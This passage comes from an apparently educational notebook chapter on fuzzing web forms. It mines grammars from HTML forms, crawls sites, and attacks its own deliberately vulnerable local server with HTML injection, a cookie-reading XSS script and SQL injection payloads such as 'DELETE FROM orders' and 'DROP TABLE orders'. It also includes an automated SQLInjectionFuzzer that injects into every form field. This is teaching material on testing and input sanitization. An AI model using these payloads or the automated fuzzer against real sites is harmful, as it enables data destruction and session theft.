We make use of [delta debugging](Reducer.ipynb) to minimize the failure-inducing path, setting up a `WebRunner` class to define the failure condition: # + slideshow={"slide_type": "fragment"} failing_path = path failing_path # + slideshow={"slide_type": "skip"} from Fuzzer import Runner # + slideshow={"slide_type": "subslide"} class WebRunner(Runner): def __init__(self, base_url=None): self.base_url = base_url def run(self, url): if self.base_url is not None: url = urljoin(self.base_url, url) import requests # for imports r = requests.get(url) if r.status_code == HTTPStatus.OK: return url, Runner.PASS elif r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR: return url, Runner.FAIL else: return url, Runner.UNRESOLVED # + slideshow={"slide_type": "subslide"} web_runner = WebRunner(httpd_url) web_runner.run(failing_path) # + [markdown] slideshow={"slide_type": "fragment"} # This is the minimized path: # + slideshow={"slide_type": "skip"} from Reducer import DeltaDebuggingReducer # minor # + slideshow={"slide_type": "fragment"} minimized_path = DeltaDebuggingReducer(web_runner).reduce(failing_path) minimized_path # + [markdown] slideshow={"slide_type": "fragment"} # It turns out that our server encounters an internal error if we do not supply the requested fields: # + slideshow={"slide_type": "fragment"} minimized_url = urljoin(httpd_url, minimized_path) minimized_url # + slideshow={"slide_type": "subslide"} clear_httpd_messages() HTML(webbrowser(minimized_url)) # + [markdown] slideshow={"slide_type": "fragment"} # We see that we might have a lot to do to make our Web server more robust against unexpected inputs. The [exercises](#Exercises) give some instructions on what to do. # + [markdown] slideshow={"slide_type": "slide"} # ## Extracting Grammars for Input Forms # # In our previous examples, we have assumed that we have a grammar that produces valid (or less valid) order queries. 
However, such a grammar does not need to be specified manually; we can also _extract it automatically_ from a Web page at hand. This way, we can apply our test generators on arbitrary Web forms without a manual specification step. # + [markdown] slideshow={"slide_type": "subslide"} # ### Searching HTML for Input Fields # # The key idea of our approach is to identify all input fields in a form. To this end, let us take a look at how the individual elements in our order form are encoded in HTML: # + slideshow={"slide_type": "subslide"} html_text = webbrowser(httpd_url) print(html_text[html_text.find("<form"):html_text.find("</form>") + len("</form>")]) # + [markdown] slideshow={"slide_type": "subslide"} # We see that there is a number of form elements that accept inputs, in particular `<input>`, but also `<select>` and `<option>`. The idea now is to _parse_ the HTML of the Web page in question, to extract these individual input elements, and then to create a _grammar_ that produces a matching URL, effectively filling out the form. # + [markdown] slideshow={"slide_type": "fragment"} # To parse the HTML page, we could define a grammar to parse HTML and make use of [our own parser infrastructure](Parser.ipynb). However, it is much easier to not reinvent the wheel and instead build on the existing, dedicated `HTMLParser` class from the Python library. # + slideshow={"slide_type": "skip"} from html.parser import HTMLParser # + [markdown] slideshow={"slide_type": "subslide"} # During parsing, we search for `<form>` tags and save the associated action (i.e., the URL to be invoked when the form is submitted) in the `action` attribute. While processing the form, we create a map `fields` that holds all input fields we have seen; it maps field names to the respective HTML input types (`"text"`, `"number"`, `"checkbox"`, etc.). Exclusive selection options map to a list of possible values; the `select` stack holds the currently active selection. 
# + slideshow={"slide_type": "fragment"}
class FormHTMLParser(HTMLParser):
    """HTML parser collecting the input elements of a Web form."""

    def reset(self):
        """Start over with a clean parsing state."""
        super().reset()

        # `action` is the form's submission URL; `fields` maps each field
        # name to its HTML input type (or each selection name to the list
        # [option_1, option_2, ...] of its option values); `select` is the
        # stack of currently active selection names.
        self.action, self.fields, self.select = "", {}, []

# + [markdown] slideshow={"slide_type": "subslide"}
# While parsing, the parser calls `handle_starttag()` for every opening tag (such as `<form>`) found; conversely, it invokes `handle_endtag()` for closing tags (such as `</form>`). `attributes` gives us a map of associated attributes and values.
#
# Here is how we process the individual tags:
# * When we find a `<form>` tag, we save the associated action in the `action` attribute;
# * When we find an `<input>` tag or similar, we save the type in the `fields` attribute;
# * When we find a `<select>` tag or similar, we push its name on the `select` stack;
# * When we find an `<option>` tag, we append the option to the list associated with the last pushed `<select>` tag. 
# + slideshow={"slide_type": "subslide"} class FormHTMLParser(FormHTMLParser): def handle_starttag(self, tag, attrs): attributes = {attr_name: attr_value for attr_name, attr_value in attrs} # print(tag, attributes) if tag == "form": self.action = attributes.get("action", "") elif tag == "select" or tag == "datalist": if "name" in attributes: name = attributes["name"] self.fields[name] = [] self.select.append(name) else: self.select.append(None) elif tag == "option" and "multiple" not in attributes: current_select_name = self.select[-1] if current_select_name is not None and "value" in attributes: self.fields[current_select_name].append(attributes["value"]) elif tag == "input" or tag == "option" or tag == "textarea": if "name" in attributes: name = attributes["name"] self.fields[name] = attributes.get("type", "text") elif tag == "button": if "name" in attributes: name = attributes["name"] self.fields[name] = [""] # + slideshow={"slide_type": "subslide"} class FormHTMLParser(FormHTMLParser): def handle_endtag(self, tag): if tag == "select": self.select.pop() # + [markdown] slideshow={"slide_type": "fragment"} # Our implementation handles only one form per Web page; it also works on HTML only, ignoring all interaction coming from JavaScript. Also, it does not support all HTML input types. # + [markdown] slideshow={"slide_type": "fragment"} # Let us put this parser to action. We create a class `HTMLGrammarMiner` that takes a HTML document to parse. 
It then returns the associated action and the associated fields:

# + slideshow={"slide_type": "subslide"}
class HTMLGrammarMiner(object):
    """Mine the form action and input fields from an HTML document."""

    def __init__(self, html_text):
        """Parse `html_text` and store the form's `action` URL and its
        `fields` map (field name -> input type or list of option values)."""
        html_parser = FormHTMLParser()
        html_parser.feed(html_text)
        self.fields = html_parser.fields
        self.action = html_parser.action

# + [markdown] slideshow={"slide_type": "fragment"}
# Applied on our order form, this is what we get:

# + slideshow={"slide_type": "fragment"}
html_miner = HTMLGrammarMiner(html_text)
html_miner.action

# + slideshow={"slide_type": "subslide"}
html_miner.fields

# + [markdown] slideshow={"slide_type": "fragment"}
# From this structure, we can now generate a grammar that automatically produces valid form submission URLs.

# + [markdown] slideshow={"slide_type": "subslide"}
# ### Mining Grammars for Web Pages

# + [markdown] slideshow={"slide_type": "fragment"}
# To create a grammar from the fields extracted from HTML, we build on the `CGI_GRAMMAR` defined in the [chapter on grammars](Grammars.ipynb). The key idea is to define rules for every HTML input type: An HTML `number` type will get values from the `<number>` rule; likewise, values for the HTML `email` type will be defined from the `<email>` rule. Our default grammar provides very simple rules for these types. 
# + slideshow={"slide_type": "skip"} from Grammars import crange, srange, new_symbol, unreachable_nonterminals, CGI_GRAMMAR, extend_grammar # + slideshow={"slide_type": "subslide"} class HTMLGrammarMiner(HTMLGrammarMiner): QUERY_GRAMMAR = extend_grammar(CGI_GRAMMAR, { "<start>": ["<action>?<query>"], "<text>": ["<string>"], "<number>": ["<digits>"], "<digits>": ["<digit>", "<digits><digit>"], "<digit>": crange('0', '9'), "<checkbox>": ["<_checkbox>"], "<_checkbox>": ["on", "off"], "<email>": ["<_email>"], "<_email>": [cgi_encode("<string>@<string>", "<>")], # Use a fixed password in case we need to repeat it "<password>": ["<_password>"], "<_password>": ["<PASSWORD>"], # Stick to printable characters to avoid logging problems "<percent>": ["%<hexdigit-1><hexdigit>"], "<hexdigit-1>": srange("34567"), # Submissions: "<submit>": [""] }) # + [markdown] slideshow={"slide_type": "subslide"} # Our grammar miner now takes the fields extracted from HTML, converting them into rules. Essentially, every input field encountered gets included in the resulting query URL; and it gets a rule expanding it into the appropriate type. 
# + slideshow={"slide_type": "subslide"} class HTMLGrammarMiner(HTMLGrammarMiner): def mine_grammar(self): grammar = extend_grammar(self.QUERY_GRAMMAR) grammar["<action>"] = [self.action] query = "" for field in self.fields: field_symbol = new_symbol(grammar, "<" + field + ">") field_type = self.fields[field] if query != "": query += "&" query += field_symbol if isinstance(field_type, str): field_type_symbol = "<" + field_type + ">" grammar[field_symbol] = [field + "=" + field_type_symbol] if field_type_symbol not in grammar: # Unknown type grammar[field_type_symbol] = ["<text>"] else: # List of values value_symbol = new_symbol(grammar, "<" + field + "-value>") grammar[field_symbol] = [field + "=" + value_symbol] grammar[value_symbol] = field_type grammar["<query>"] = [query] # Remove unused parts for nonterminal in unreachable_nonterminals(grammar): del grammar[nonterminal] assert is_valid_grammar(grammar) return grammar # + [markdown] slideshow={"slide_type": "subslide"} # Let us show `HTMLGrammarMiner` in action, again applied on our order form. Here is the full resulting grammar: # + slideshow={"slide_type": "subslide"} html_miner = HTMLGrammarMiner(html_text) grammar = html_miner.mine_grammar() grammar # + [markdown] slideshow={"slide_type": "subslide"} # Let us take a look into the structure of the grammar. 
It produces URL paths of this form: # + slideshow={"slide_type": "fragment"} grammar["<start>"] # + [markdown] slideshow={"slide_type": "fragment"} # Here, the `<action>` comes from the `action` attribute of the HTML form: # + slideshow={"slide_type": "fragment"} grammar["<action>"] # + [markdown] slideshow={"slide_type": "fragment"} # The `<query>` is composed from the individual field items: # + slideshow={"slide_type": "fragment"} grammar["<query>"] # + [markdown] slideshow={"slide_type": "fragment"} # Each of these fields has the form `<field-name>=<field-type>`, where `<field-type>` is already defined in the grammar: # + slideshow={"slide_type": "fragment"} grammar["<zip>"] # + slideshow={"slide_type": "subslide"} grammar["<terms>"] # + [markdown] slideshow={"slide_type": "fragment"} # These are the query URLs produced from the grammar. We see that these are similar to the ones produced from our hand-crafted grammar, except that the string values for names, email addresses, and cities are now completely random: # + slideshow={"slide_type": "fragment"} order_fuzzer = GrammarFuzzer(grammar) [order_fuzzer.fuzz() for i in range(3)] # + [markdown] slideshow={"slide_type": "fragment"} # We can again feed these directly into our Web browser: # + slideshow={"slide_type": "subslide"} HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz()))) # + [markdown] slideshow={"slide_type": "fragment"} # We see (one more time) that we can mine a grammar automatically from given data. # + [markdown] slideshow={"slide_type": "subslide"} # ### A Fuzzer for Web Forms # # To make things most convenient, let us define a `WebFormFuzzer` class that does everything in one place. Given a URL, it extracts its HTML content, mines the grammar and then produces inputs for it. 
# + slideshow={"slide_type": "subslide"} class WebFormFuzzer(GrammarFuzzer): def __init__(self, url, **grammar_fuzzer_options): html_text = self.get_html(url) grammar = self.get_grammar(html_text) super().__init__(grammar, **grammar_fuzzer_options) def get_html(self, url): return requests.get(url).text def get_grammar(self, html_text): grammar_miner = HTMLGrammarMiner(html_text) return grammar_miner.mine_grammar() # + [markdown] slideshow={"slide_type": "fragment"} # All it now takes to fuzz a Web form is to provide its URL: # + slideshow={"slide_type": "subslide"} web_form_fuzzer = WebFormFuzzer(httpd_url) web_form_fuzzer.fuzz() # + [markdown] slideshow={"slide_type": "fragment"} # We can combine the fuzzer with a `WebRunner` as defined above to run the resulting fuzz inputs directly on our Web server: # + slideshow={"slide_type": "subslide"} web_form_runner = WebRunner(httpd_url) web_form_fuzzer.runs(web_form_runner, 10) # + [markdown] slideshow={"slide_type": "subslide"} # While convenient to use, this fuzzer is still very rudimentary: # # * It is limited to one form per page. # * It only supports `GET` actions (i.e., inputs encoded into the URL). A full Web form fuzzer would have to at least support `POST` actions. # * The fuzzer is build on HTML only. There is no Javascript handling for dynamic Web pages. # + [markdown] slideshow={"slide_type": "fragment"} # Let us clear any pending messages before we get to the next section: # + slideshow={"slide_type": "fragment"} clear_httpd_messages() # + [markdown] slideshow={"slide_type": "slide"} # ## Crawling User Interfaces # # # + [markdown] slideshow={"slide_type": "fragment"} # So far, we have assumed there would be only one form to explore. A real Web server, of course, has several pages – and possibly several forms, too. We define a simple *crawler* that explores all the links that originate from one page. # + [markdown] slideshow={"slide_type": "subslide"} # Our crawler is pretty straightforward. 
Its main component is again a `HTMLParser` that analyzes the HTML code for links of the form # # ```html # <a href="<link>"> # ``` # # and saves all the links found in a list called `links`. # + slideshow={"slide_type": "subslide"} class LinkHTMLParser(HTMLParser): def reset(self): super().reset() self.links = [] def handle_starttag(self, tag, attrs): attributes = {attr_name: attr_value for attr_name, attr_value in attrs} if tag == "a" and "href" in attributes: # print("Found:", tag, attributes) self.links.append(attributes["href"]) # + [markdown] slideshow={"slide_type": "subslide"} # The actual crawler comes as a _generator function_ `crawl()` which produces one URL after another. By default, it returns only URLs that reside on the same host; the parameter `max_pages` controls how many pages (default: 1) should be scanned. We also respect the `robots.txt` file on the remote site to check which pages we are allowed to scan. # + slideshow={"slide_type": "skip"} from collections import deque import urllib.robotparser # + slideshow={"slide_type": "subslide"} def crawl(url, max_pages=1, same_host=True): """Return the list of linked URLs from the given URL. 
Accesses up to `max_pages`.""" pages = deque([(url, "<param>")]) urls_seen = set() rp = urllib.robotparser.RobotFileParser() rp.set_url(urljoin(url, "/robots.txt")) rp.read() while len(pages) > 0 and max_pages > 0: page, referrer = pages.popleft() if not rp.can_fetch("*", page): # Disallowed by robots.txt continue r = requests.get(page) max_pages -= 1 if r.status_code != HTTPStatus.OK: print("Error " + repr(r.status_code) + ": " + page, "(referenced from " + referrer + ")", file=sys.stderr) continue content_type = r.headers["content-type"] if not content_type.startswith("text/html"): continue parser = LinkHTMLParser() parser.feed(r.text) for link in parser.links: target_url = urljoin(page, link) if same_host and urlsplit( target_url).hostname != urlsplit(url).hostname: # Different host continue if urlsplit(target_url).fragment != "": # Ignore #fragments continue if target_url not in urls_seen: pages.append((target_url, page)) urls_seen.add(target_url) yield target_url if page not in urls_seen: urls_seen.add(page) yield page # + [markdown] slideshow={"slide_type": "subslide"} # We can run the crawler on our own server, where it will quickly return the order page and the terms and conditions page. # + slideshow={"slide_type": "fragment"} for url in crawl(httpd_url): print_httpd_messages() print_url(url) # + [markdown] slideshow={"slide_type": "fragment"} # We can also crawl over other sites, such as the home page of this project. 
# + slideshow={"slide_type": "subslide"} for url in crawl("https://www.fuzzingbook.org/"): print_url(url) # + [markdown] slideshow={"slide_type": "subslide"} # Once we have crawled over all the links of a site, we can generate tests for all the forms we found: # + slideshow={"slide_type": "fragment"} for url in crawl(httpd_url, max_pages=float('inf')): web_form_fuzzer = WebFormFuzzer(url) web_form_runner = WebRunner(url) print(web_form_fuzzer.run(web_form_runner)) # + [markdown] slideshow={"slide_type": "fragment"} # For even better effects, one could integrate crawling and fuzzing – and also analyze the order confirmation pages for further links. We leave this to the reader as an exercise. # + [markdown] slideshow={"slide_type": "fragment"} # Let us get rid of any server messages accumulated above: # + slideshow={"slide_type": "fragment"} clear_httpd_messages() # + [markdown] slideshow={"slide_type": "slide"} # ## Crafting Web Attacks # # Before we close the chapter, let us take a look at a special class of "uncommon" inputs that not only yield generic failures, but actually allow _attackers_ to manipulate the server at their will. We will illustrate three common attacks using our server, which (surprise) actually turns out to be vulnerable against all of them. # + [markdown] slideshow={"slide_type": "subslide"} # ### HTML Injection Attacks # # The first kind of attack we look at is *HTML injection*. The idea of HTML injection is to supply the Web server with _data that can also be interpreted as HTML_. If this HTML data is then displayed to users in their Web browsers, it can serve malicious purposes, although (seemingly) originating from a reputable site. If this data is also _stored_, it becomes a _persistent_ attack; the attacker does not even have to lure victims towards specific pages. # + [markdown] slideshow={"slide_type": "fragment"} # Here is an example of a (simple) HTML injection. 
For the `name` field, we not only use plain text, but also embed HTML tags – in this case, a link towards a malware-hosting site.

# + slideshow={"slide_type": "skip"}
from Grammars import extend_grammar

# + slideshow={"slide_type": "subslide"}
# The <name> field now carries raw HTML; since the server does not
# escape its inputs, this HTML ends up verbatim in the confirmation page.
ORDER_GRAMMAR_WITH_HTML_INJECTION = extend_grammar(ORDER_GRAMMAR, {
    "<name>": [cgi_encode('''
<NAME><p>
<strong><a href="www.lots.of.malware">Click here for cute cat pictures!</a></strong>
</p>
''')],
})

# + [markdown] slideshow={"slide_type": "fragment"}
# If we use this grammar to create inputs, the resulting URL will have all of the HTML encoded in:

# + slideshow={"slide_type": "fragment"}
html_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_HTML_INJECTION)
order_with_injected_html = html_injection_fuzzer.fuzz()
order_with_injected_html

# + [markdown] slideshow={"slide_type": "subslide"}
# What happens if we send this string to our Web server? It turns out that the HTML is left in the confirmation page and shown as a link. This also happens in the log:

# + slideshow={"slide_type": "fragment"}
HTML(webbrowser(urljoin(httpd_url, order_with_injected_html)))

# + [markdown] slideshow={"slide_type": "fragment"}
# Since the link seemingly comes from a trusted origin, users are much more likely to follow it. The link is even persistent, as it is stored in the database:

# + slideshow={"slide_type": "fragment"}
print(db.execute("SELECT * FROM orders WHERE name LIKE '%<%'").fetchall())

# + [markdown] slideshow={"slide_type": "subslide"}
# This means that anyone ever querying the database (for instance, operators processing the order) will also see the link, multiplying its impact. By carefully crafting the injected HTML, one can thus expose malicious content to a large number of users – until the injected HTML is finally deleted.

# + [markdown] slideshow={"slide_type": "subslide"}
# ### Cross-Site Scripting Attacks
#
# If one can inject HTML code into a Web page, one can also inject *JavaScript* code as part of the injected HTML. 
This code would then be executed as soon as the injected HTML is rendered. # # This is particularly dangerous because executed JavaScript always executes in the _origin_ of the page which contains it. Therefore, an attacker can normally not force a user to run JavaScript in any origin he does not control himself. When an attacker, however, can inject his code into a vulnerable Web application, he can have the client run the code with the (trusted) Web application as origin. # # In such a *cross-site scripting* (*XSS*) attack, the injected script can do a lot more than just plain HTML. For instance, the code can access sensitive page content or session cookies. If the code in question runs in the operator's browser (for instance, because an operator is reviewing the list of orders), it could retrieve any other information shown on the screen and thus steal order details for a variety of customers. # + [markdown] slideshow={"slide_type": "subslide"} # Here is a very simple example of a script injection. Whenever the name is displayed, it causes the browser to "steal" the current *session cookie* – the piece of data the browser uses to identify the user with the server. In our case, we could steal the cookie of the Jupyter session. 
# + slideshow={"slide_type": "fragment"} ORDER_GRAMMAR_WITH_XSS_INJECTION = extend_grammar(ORDER_GRAMMAR, { "<name>": [cgi_encode('<NAME>' + '<script>' + 'document.title = document.cookie.substring(0, 10);' + '</script>') ], }) # + slideshow={"slide_type": "subslide"} xss_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_XSS_INJECTION) order_with_injected_xss = xss_injection_fuzzer.fuzz() order_with_injected_xss # + slideshow={"slide_type": "fragment"} url_with_injected_xss = urljoin(httpd_url, order_with_injected_xss) url_with_injected_xss # + slideshow={"slide_type": "fragment"} HTML(webbrowser(url_with_injected_xss, mute=True)) # + [markdown] slideshow={"slide_type": "subslide"} # The message looks as always – but if you have a look at your browser title, it should now show the first 10 characters of your "secret" notebook cookie. Instead of showing its prefix in the title, the script could also silently send the cookie to a remote server, allowing attackers to highjack your current notebook session and interact with the server on your behalf. It could also go and access and send any other data that is shown in your browser or otherwise available. It could run a *keylogger* and steal passwords and other sensitive data as it is typed in. Again, it will do so every time the compromised order with <NAME>'s name is shown in the browser and the associated script is executed. # + [markdown] slideshow={"slide_type": "fragment"} # Let us go and reset the title to a less sensitive value: # + slideshow={"slide_type": "fragment"} HTML('<script>document.title = "Jupyter"</script>') # + [markdown] slideshow={"slide_type": "subslide"} # ### SQL Injection Attacks # # Cross-site scripts have the same privileges as web pages – most notably, they cannot access or change data outside of your browser. So-called *SQL injection* targets _databases_, allowing to inject commands that can read or modify data in the database, or change the purpose of the original query. 
# + [markdown] slideshow={"slide_type": "subslide"} # To understand how SQL injection works, let us take a look at the code that produces the SQL command to insert a new order into the database: # # ```python # sql_command = ("INSERT INTO orders " + # "VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values)) # ``` # # What happens if any of the values (say, `name`) has a value that _can also be interpreted as a SQL command?_ Then, instead of the intended `INSERT` command, we would execute the command imposed by `name`. # + [markdown] slideshow={"slide_type": "subslide"} # Let us illustrate this by an example. We set the individual values as they would be found during execution: # + slideshow={"slide_type": "fragment"} values = { "item": "tshirt", "name": "<NAME>", "email": "<EMAIL>", "city": "Seattle", "zip": "98104" } # + [markdown] slideshow={"slide_type": "fragment"} # and format the string as seen above: # + slideshow={"slide_type": "fragment"} sql_command = ("INSERT INTO orders " + "VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values)) sql_command # + [markdown] slideshow={"slide_type": "subslide"} # All fine, right? But now, we define a very "special" name that can also be interpreted as a SQL command: # + slideshow={"slide_type": "fragment"} values["name"] = "Jane', 'x', 'x', 'x'); DELETE FROM orders; -- " # + slideshow={"slide_type": "fragment"} sql_command = ("INSERT INTO orders " + "VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values)) sql_command # + [markdown] slideshow={"slide_type": "fragment"} # What happens here is that we now get a command to insert values into the database (with a few "dummy" values `x`), followed by a SQL `DELETE` command that would _delete all entries_ of the orders table. The string `-- ` starts a SQL _comment_ such that the remainder of the original query would be easily ignored. 
By crafting strings that can also be interpreted as SQL commands, attackers can alter or delete database data, bypass authentication mechanisms and many more. # + [markdown] slideshow={"slide_type": "subslide"} # Is our server also vulnerable to such attacks? Of course it is. We create a special grammar such that we can set the `<name>` parameter to a string with SQL injection, just as shown above. # + slideshow={"slide_type": "skip"} from Grammars import extend_grammar # + slideshow={"slide_type": "fragment"} ORDER_GRAMMAR_WITH_SQL_INJECTION = extend_grammar(ORDER_GRAMMAR, { "<name>": [cgi_encode("Jane', 'x', 'x', 'x'); DELETE FROM orders; --")], }) # + slideshow={"slide_type": "fragment"} sql_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_SQL_INJECTION) order_with_injected_sql = sql_injection_fuzzer.fuzz() order_with_injected_sql # + [markdown] slideshow={"slide_type": "fragment"} # These are the current orders: # + slideshow={"slide_type": "fragment"} print(db.execute("SELECT * FROM orders").fetchall()) # + [markdown] slideshow={"slide_type": "subslide"} # Let us go and send our URL with SQL injection to the server. From the log, we see that the "malicious" SQL command is formed just as sketched above, and executed, too. # + slideshow={"slide_type": "fragment"} contents = webbrowser(urljoin(httpd_url, order_with_injected_sql)) # + [markdown] slideshow={"slide_type": "fragment"} # All orders are now gone: # + slideshow={"slide_type": "fragment"} print(db.execute("SELECT * FROM orders").fetchall()) # + [markdown] slideshow={"slide_type": "fragment"} # This effect is also illustrated [in this very popular XKCD comic](https://xkcd.com/327/): # + [markdown] slideshow={"slide_type": "fragment"} # ![https://xkcd.com/327/](PICS/xkcd_exploits_of_a_mom.png){width=100%} # + [markdown] slideshow={"slide_type": "subslide"} # Even if we had not been able to execute arbitrary commands, being able to compromise an orders database offers several possibilities for mischief. 
For instance, we could use the address and matching credit card number of an existing person to go through validation and submit an order, only to have the order then delivered to an address of our choice. We could also use SQL injection to inject HTML and JavaScript code as above, bypassing possible sanitization geared at these domains. # + [markdown] slideshow={"slide_type": "fragment"} # To avoid such effects, the remedy is to _sanitize_ all third-party inputs – no character in the input must be interpretable as plain HTML, JavaScript, or SQL. This is achieved by properly _quoting_ and _escaping_ inputs. The [exercises](#Exercises) give some instructions on what to do. # + [markdown] slideshow={"slide_type": "subslide"} # ### Leaking Internal Information # # To craft the above SQL queries, we have used _insider information_ – for instance, we knew the name of the table as well as its structure. Surely, an attacker would not know this and thus not be able to run the attack, right? Unfortunately, it turns out we are leaking all of this information out to the world in the first place. The error message produced by our server reveals everything we need: # + slideshow={"slide_type": "fragment"} answer = webbrowser(urljoin(httpd_url, "/order"), mute=True) # + slideshow={"slide_type": "fragment"} HTML(answer) # + [markdown] slideshow={"slide_type": "subslide"} # The best way to avoid information leakage through failures is of course not to fail in the first place. But if you fail, make it hard for the attacker to establish a link between the attack and the failure. Do not produce "internal error" messages (and certainly not ones with internal information); do not become unresponsive; just go back to the home page and ask the user to supply correct data. One more time, the [exercises](#Exercises) give some instructions on how to fix the server. 
# + [markdown] slideshow={"slide_type": "fragment"} # If you can manipulate the server not only to alter information, but also to _retrieve_ information, you can learn about table names and structure by accessing special _tables_ (also called *data dictionary*) in which database servers store their metadata. In the MySQL server, for instance, the special table `information_schema` holds metadata such as the names of databases and tables, data types of columns, or access privileges. # + [markdown] slideshow={"slide_type": "slide"} # ## Fully Automatic Web Attacks # + [markdown] slideshow={"slide_type": "fragment"} # So far, we have demonstrated the above attacks using our manually written order grammar. However, the attacks also work for generated grammars. We extend `HTMLGrammarMiner` by adding a number of common SQL injection attacks: # + slideshow={"slide_type": "subslide"} class SQLInjectionGrammarMiner(HTMLGrammarMiner): ATTACKS = [ "<string>' <sql-values>); <sql-payload>; <sql-comment>", "<string>' <sql-comment>", "' OR 1=1<sql-comment>'", "<number> OR 1=1", ] def __init__(self, html_text, sql_payload): super().__init__(html_text) self.QUERY_GRAMMAR = extend_grammar(self.QUERY_GRAMMAR, { "<text>": ["<string>", "<sql-injection-attack>"], "<number>": ["<digits>", "<sql-injection-attack>"], "<checkbox>": ["<_checkbox>", "<sql-injection-attack>"], "<email>": ["<_email>", "<sql-injection-attack>"], "<sql-injection-attack>": [ cgi_encode(attack, "<->") for attack in self.ATTACKS ], "<sql-values>": ["", cgi_encode("<sql-values>, '<string>'", "<->")], "<sql-payload>": [cgi_encode(sql_payload)], "<sql-comment>": ["--", "#"], }) # + slideshow={"slide_type": "subslide"} html_miner = SQLInjectionGrammarMiner( html_text, sql_payload="DROP TABLE orders") # + slideshow={"slide_type": "subslide"} grammar = html_miner.mine_grammar() grammar # + slideshow={"slide_type": "subslide"} grammar["<text>"] # + [markdown] slideshow={"slide_type": "fragment"} # We see that several 
fields now are tested for vulnerabilities:

# + slideshow={"slide_type": "fragment"}
sql_fuzzer = GrammarFuzzer(grammar)
sql_fuzzer.fuzz()

# + slideshow={"slide_type": "fragment"}
print(db.execute("SELECT * FROM orders").fetchall())

# + slideshow={"slide_type": "fragment"}
contents = webbrowser(urljoin(httpd_url,
                              "/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"))

# + slideshow={"slide_type": "subslide"}
def orders_db_is_empty():
    """Return True if the orders table has no entries (or no longer exists).

    A missing table raises `sqlite3.OperationalError` -- this is treated as
    "empty", since a successful injection may have dropped the table entirely.
    """
    try:
        entries = db.execute("SELECT * FROM orders").fetchall()
    except sqlite3.OperationalError:
        # Table is gone -- e.g. dropped by an injected SQL command
        return True
    return len(entries) == 0

# + slideshow={"slide_type": "fragment"}
orders_db_is_empty()

# + slideshow={"slide_type": "subslide"}
class SQLInjectionFuzzer(WebFormFuzzer):
    """A `WebFormFuzzer` whose generated form values include SQL injection attacks."""

    def __init__(self, url, sql_payload="", **kwargs):
        """Constructor.
        `url` - the URL of the form to be fuzzed.
        `sql_payload` - the SQL command to inject into form fields.
        Remaining keyword arguments are passed on to `WebFormFuzzer`."""
        self.sql_payload = sql_payload
        super().__init__(url, **kwargs)

    def get_grammar(self, html_text):
        """Mine a grammar from `html_text`, extending field values
        with SQL injection attacks carrying `self.sql_payload`."""
        grammar_miner = SQLInjectionGrammarMiner(
            html_text, sql_payload=self.sql_payload)
        return grammar_miner.mine_grammar()

# + slideshow={"slide_type": "subslide"}
sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders")
web_runner = WebRunner(httpd_url)
trials = 1

# Keep fuzzing until the injected DELETE has emptied the orders table
while True:
    sql_fuzzer.run(web_runner)
    if orders_db_is_empty():
        break
    trials += 1

# + slideshow={"slide_type": "fragment"}
trials

# + [markdown] slideshow={"slide_type": "fragment"}
# Our attack was successful! After less than a second of testing, our database is empty:

# + slideshow={"slide_type": "fragment"}
orders_db_is_empty()

# + [markdown] slideshow={"slide_type": "subslide"}
# Again, note the level of possible automation: We can
#
# * Crawl the Web pages of a host for possible forms
# * Automatically identify form fields and possible values
# * Inject SQL (or HTML, or JavaScript) into any of these fields
#
# and all of this fully automatically, not needing anything but the URL of the site.

# + [markdown] slideshow={"slide_type": "subslide"}
# The bad news is that with a tool set as the above, anyone can attack web sites.
The even worse news is that such penetration tests take place every day, on every web site. The good news, though, is that after reading this chapter, you now get an idea of how Web servers are attacked every day – and what you as a Web server maintainer could and should do to prevent this. # + [markdown] slideshow={"slide_type": "slide"} # ## Synopsis # # This chapter provides a simple (and vulnerable) Web server and two experimental fuzzers that are applied to it. # + [markdown] slideshow={"slide_type": "subslide"} # ### Fuzzing Web Forms # # `WebFormFuzzer` demonstrates how to interact with a Web form. Given a URL with a Web form, it automatically extracts a grammar that produces a URL; this URL contains values for all form elements. Support is limited to GET forms and a subset of HTML form elements. # + [markdown] slideshow={"slide_type": "fragment"} # Here's the grammar extracted for our vulnerable Web server: # + slideshow={"slide_type": "fragment"} web_form_fuzzer = WebFormFuzzer(httpd_url) # + slideshow={"slide_type": "fragment"} web_form_fuzzer.grammar['<start>'] # + slideshow={"slide_type": "fragment"} web_form_fuzzer.grammar['<action>'] # + slideshow={"slide_type": "fragment"} web_form_fuzzer.grammar['<query>'] # + [markdown] slideshow={"slide_type": "subslide"} # Using it for fuzzing yields a path with all form values filled; accessing this path acts like filling out and submitting the form. # + slideshow={"slide_type": "fragment"} web_form_fuzzer.fuzz() # + [markdown] slideshow={"slide_type": "fragment"} # Repeated calls to `WebFormFuzzer.fuzz()` invoke the form again and again, each time with different (fuzzed) values. # + [markdown] slideshow={"slide_type": "subslide"} # ### SQL Injection Attacks # # `SQLInjectionFuzzer` is an experimental extension of `WebFormFuzzer` whose constructor takes an additional _payload_ – an SQL command to be injected and executed on the server. 
Otherwise, it is used like `WebFormFuzzer`: # + slideshow={"slide_type": "fragment"} sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders") sql_fuzzer.fuzz() # + [markdown] slideshow={"slide_type": "fragment"} # As you can see, the path to be retrieved contains the payload encoded into one of the form field values. # + [markdown] slideshow={"slide_type": "fragment"} # `SQLInjectionFuzzer` is a proof-of-concept on how to build a malicious fuzzer; you should study and extend its code to make actual use of it. # + [markdown] button=false new_sheet=true run_control={"read_only": false} slideshow={"slide_type": "slide"} # ## Lessons Learned # # * User Interfaces (in the Web and elsewhere) should be tested with _expected_ and _unexpected_ values. # * One can _mine grammars from user interfaces_, allowing for their widespread testing. # * Consequent _sanitizing_ of inputs prevents common attacks such as code and SQL injection. # * Do not attempt to write a Web server yourself, as you are likely to repeat all the mistakes of others. # + [markdown] slideshow={"slide_type": "fragment"} # We're done, so we can clean up: # + slideshow={"slide_type": "fragment"} clear_httpd_messages() # + slideshow={"slide_type": "fragment"} httpd_process.terminate() # + [markdown] button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "slide"} # 